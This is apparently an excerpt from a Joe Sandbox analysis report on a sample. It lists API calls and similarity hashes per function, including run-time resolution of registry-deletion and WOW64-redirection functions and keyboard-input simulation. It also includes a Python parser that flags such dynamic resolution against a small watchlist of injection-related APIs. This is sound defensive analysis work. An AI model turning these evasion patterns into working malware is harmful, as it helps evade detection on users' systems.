• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 2574300362-2819208100
• Opcode ID: aa5a655daf668c14a2c96854cae34fe12a0c9a9474d63dbcb7db7807251be550
• Instruction ID: 71c662e4befc18476de9a9b9e97596b814a8a20ace5c364735b949b18affda8a
• Opcode Fuzzy Hash: aa5a655daf668c14a2c96854cae34fe12a0c9a9474d63dbcb7db7807251be550
• Instruction Fuzzy Hash: 0CE08C70244B0CAFDB615F21EC0DB653A6AB750B16F010418FA0DE20B0CFB88058FF02
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: fa505a2ff73cabe893d6d34c77f6d1223b1b058ca298374d0a694a906bb01ecf
• Instruction ID: d75641ed44f8441310779f30444936fd3e113933c03c6377098289339b991faa
• Opcode Fuzzy Hash: fa505a2ff73cabe893d6d34c77f6d1223b1b058ca298374d0a694a906bb01ecf
• Instruction Fuzzy Hash: 7AE0ECB280461C9BCA1097518D05AF973BCA704791F1020D3F946A1100D675DB95FA23
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00EC42EC,?,00EC42AA,?), ref: 00EC4304
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4316
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: 73f7752026ae66359ba16525471c5b3ada6aef9e29d97d53ae0066cc51e2717a
• Instruction ID: b5df4cc758a9d42b7582d1ddb510e08819dbb9248b686ec2238dcbf3647f259f
• Opcode Fuzzy Hash: 73f7752026ae66359ba16525471c5b3ada6aef9e29d97d53ae0066cc51e2717a
• Instruction Fuzzy Hash: 07D0A7B4500B12EFE7204F24EC0CB0176E4AB55309B00841EFD45E21A0D7B0C880D711
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00F221FB,?,00F223EF), ref: 00F22213
• GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F22225
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 2574300362-399901964
• Opcode ID: a490f0138c6ba8220713da99837ff072296514eb33a5b7713c8d17b9f7e98f02
• Instruction ID: f53ca8f77c19a0a5961560e8ece480ec97d7ae2c366ab6a7fde9b1ae5790fa11
• Opcode Fuzzy Hash: a490f0138c6ba8220713da99837ff072296514eb33a5b7713c8d17b9f7e98f02
• Instruction Fuzzy Hash: 69D0A738900726EFE7614F30F80860176D4EB15314B00841AEC45E2190E771D880FB51
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00EC41BB,00EC4341,?,00EC422F,?,00EC41BB,?,?,?,?,00EC39FE,?,00000001), ref: 00EC4359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC436B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: f6e6670360e77534ba03d549a710ad85ea011ca15411b91d057207764adc7529
• Instruction ID: 7d122ebbc53a713008d80f95b722d1a13d5313f4ebfae7c2f506d713f1a375dd
• Opcode Fuzzy Hash: f6e6670360e77534ba03d549a710ad85ea011ca15411b91d057207764adc7529
• Instruction Fuzzy Hash: E1D0A774500B12AFD7204F34E908B0276E4AB6171DB00841EEC85E2190D7B0D880D711
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00F0052F,?,00F006D7), ref: 00F00572
• GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00F00584
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: AddressLibraryLoadProc
• String ID: UnRegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1587604923
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,00F0051D,?,00F005FE), ref: 00F00547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00F00559
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00F1ECBE,?,00F1EBBB), ref: 00F1ECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F1ECE8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00F1BAD3,00000001,00F1B6EE,?,00F5DC00), ref: 00F1BAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F1BAFD
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00F23BD1,?,00F23E06), ref: 00F23BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F23BFB
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                                      • Opcode ID: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
                                                                                                                                                                                                                                                      • Instruction ID: 024d6751b73f3ae5c7b776fe9784117c70692bae4526b2726fe7161c2cceac55
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AD0A7B4A407669FD7205F60FC08603FAF4AB12328B10841EEC49E2250D7B4D480EE11
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 1e3500991697298638e4b6126a9ca95621ed30baf5082d0c82bce4dc77d8d262
                                                                                                                                                                                                                                                      • Instruction ID: 71c595fe3d085fe9732a8273d39d636db852b1b4b159b0acb3567e57a6a952df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e3500991697298638e4b6126a9ca95621ed30baf5082d0c82bce4dc77d8d262
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37C16C75A0021AEFCB14CF94C884BBEB7B5FF48704F209599EA85AB252D730DE41DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00F1AAB4
                                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00F1AABF
                                                                                                                                                                                                                                                        • Part of subcall function 00F00213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0027B
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F1AACA
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F1AD9D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 780911581-0
                                                                                                                                                                                                                                                      • Opcode ID: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
                                                                                                                                                                                                                                                      • Instruction ID: 4e0ab1b6eaf24f528e3769816adee79b079eaf241284299a4816920a940cfe33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BA14735604B019FCB10DF14C985B5AB7E4BF88320F04444DFA9AAB3A2CB31ED41DB86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2808897238-0
                                                                                                                                                                                                                                                      • Opcode ID: a70569230a2dde5cd0d1f7a80af29803434ae06e6c553de4b508da8387776891
                                                                                                                                                                                                                                                      • Instruction ID: c6405272a6336ae482897bfc11dbfa334ba45c48a0cec8dc63b43590f2672add
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a70569230a2dde5cd0d1f7a80af29803434ae06e6c553de4b508da8387776891
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8851BA34A0530A9BDB24AF65D491B7EB3E9EF55314F20A81FE6D6EB2D3DB3098418701
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(011471B0,?), ref: 00F2C544
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,00000002), ref: 00F2C574
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F2C5DA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                                                                                                      • Opcode ID: 3eb17eaa742934907e3c68db40ad4d64101cca202ea1c142c7b5dd4bef754df1
                                                                                                                                                                                                                                                      • Instruction ID: 99443323b03a8a83fecefe31dca0d96e4743eb41644b4d142b0a71dde0e55627
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb17eaa742934907e3c68db40ad4d64101cca202ea1c142c7b5dd4bef754df1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51515E75900118EFCF20DF68D881AAE7BB6FB55320F148259F95997290D734ED81EB90
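The per-function records above (APIs list, Memory Dump Source, Similarity block with API ID, String ID and fuzzy hashes) are what an analyst usually wants to pull out of a report like this in bulk, for example to find every function that resolves an API at run time rather than through the import table, as the first record does for RegDeleteKeyExW in advapi32.dll. The following parser is an added example written for this page; it is not Joe Sandbox code and does not use any Joe Sandbox API. The sample text is copied from the records above with extraction whitespace and link residue trimmed. Two things are assumptions of the example rather than documented behaviour: that the API ID is a word digest of the called APIs (observed here as "AddressLibraryLoadProc" for LoadLibrary plus GetProcAddress), and the watchlist of API names, which is constructed for illustration.

```python
"""Parse Joe Sandbox per-function records and flag dynamic API resolution.
Added example; not Joe Sandbox code. Field names follow the report text."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: two records copied from the report listing, trimmed.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
• Instruction ID: 024d6751b73f3ae5c7b776fe9784117c70692bae4526b2726fe7161c2cceac55
• Opcode Fuzzy Hash: 246ed2b4ce1dc73cb11bc3c853aebe479b269dec9170aff887e5936a47861d85
• Instruction Fuzzy Hash: 2AD0A7B4A407669FD7205F60FC08603FAF4AB12328B10841EEC49E2250D7B4D480EE11
APIs
• CoInitialize.OLE32(00000000), ref: 00F1AAB4
• CoUninitialize.OLE32 ref: 00F1AABF
  • Part of subcall function 00F00213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0027B
• VariantInit.OLEAUT32(?), ref: 00F1AACA
• VariantClear.OLEAUT32(?), ref: 00F1AD9D
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
• Instruction ID: 4e0ab1b6eaf24f528e3769816adee79b079eaf241284299a4816920a940cfe33
• Opcode Fuzzy Hash: 33c73e409a93a058d119a38d312362c72cedbfa0e29f37ce054b0e15537698f7
• Instruction Fuzzy Hash: 2BA14735604B019FCB10DF14C985B5AB7E4BF88320F04444DFA9AAB3A2CB31ED41DB86
"""

# "Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall note.
CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+): ?(?P<value>.*)$")
HEADINGS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # parent address for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)   # API ID, String ID, hashes, ...
    associated: List[str] = field(default_factory=list)  # "Associated" dump names

    @property
    def api_id(self) -> str:
        return self.meta.get("API ID", "")

    @property
    def string_id(self) -> str:
        return self.meta.get("String ID", "")

def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; "Instruction Fuzzy Hash" is the last field of each."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            line = line[1:].strip()
        if not line or line in HEADINGS:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref"), m.group("parent")))
            continue
        m = KV_RE.match(line)
        if not m:
            continue  # unknown line (e.g. leftover link text): ignore
        key, value = m.group("key"), m.group("value").strip()
        if key == "Associated":
            cur.associated.append(value)
        else:
            cur.meta[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records

def dynamic_resolution_targets(rec: FunctionRecord) -> List[Tuple[str, str]]:
    """(export, dll) pairs for functions whose API ID carries the LoadLibrary +
    GetProcAddress words and whose String ID names a DLL. ASSUMPTION: the API ID
    is a word digest of the called APIs; String ID joins strings with '$'."""
    words = rec.api_id.replace("$", "")
    if not all(w in words for w in ("Address", "Proc", "Load", "Library")):
        return []
    tokens = [t for t in rec.string_id.split("$") if t]
    dlls = [t for t in tokens if t.lower().endswith(".dll")]
    exports = [t for t in tokens if not t.lower().endswith(".dll")]
    return [(e, d) for d in dlls for e in exports]

# Constructed watchlist for this example; the tags are the analyst's own labels.
WATCHLIST = {
    "RegDeleteKeyExW": "registry key deletion",
    "CoCreateInstance": "COM object instantiation",
    "SetThreadContext": "thread context modification",
    "WriteProcessMemory": "write into another process",
}

def watchlist_hits(records: List[FunctionRecord]) -> List[Tuple[str, str, str]]:
    """(api, how, tag): 'direct call' when listed under APIs, 'dynamic:<dll>' when
    only reachable via LoadLibrary/GetProcAddress with the name held as a string."""
    hits = []
    for rec in records:
        for call in rec.apis:
            if call.name in WATCHLIST:
                hits.append((call.name, "direct call", WATCHLIST[call.name]))
        for export, dll in dynamic_resolution_targets(rec):
            if export in WATCHLIST:
                hits.append((export, "dynamic:" + dll, WATCHLIST[export]))
    return hits

if __name__ == "__main__":
    for api, how, tag in watchlist_hits(parse_records(SAMPLE)):
        print(f"{api:20} {how:22} {tag}")
```

Run against a whole report, the distinction between "direct call" and "dynamic" matters: an API that appears only as a string next to a DLL name will not show up in the import table or in a static import-based signature, so the String ID field is the place to look for it.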
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EFC462
• __itow.LIBCMT ref: 00EFC49C
  • Part of subcall function 00EFC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EFC753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EFC505
• __itow.LIBCMT ref: 00EFC55A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                                                                                      • Opcode ID: 5be8b21a3d04f22af4f80c8b5ad09f68784fa82181f3ad5598d06377aa236c52
                                                                                                                                                                                                                                                      • Instruction ID: 1a0f4921e5af301debb824f99546e195acb325c72444381c9a3bf30ce14d56e6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be8b21a3d04f22af4f80c8b5ad09f68784fa82181f3ad5598d06377aa236c52
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5941E47160060CABDF11DF54C955FFE7BF9AF48704F201059FA09B7281DB71AA4A8BA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F03966
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F03982
                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00F039EF
                                                                                                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00F03A4D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                                                                                                      • Opcode ID: d72e2c073d6738172006a9f7dcdcdb4f00446ce888065eafe74a59429d2fba7c
                                                                                                                                                                                                                                                      • Instruction ID: 8968debab7dccb28523c900cc86468b709ec9d73aaeac55ad3e18d8e6c50d510
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d72e2c073d6738172006a9f7dcdcdb4f00446ce888065eafe74a59429d2fba7c
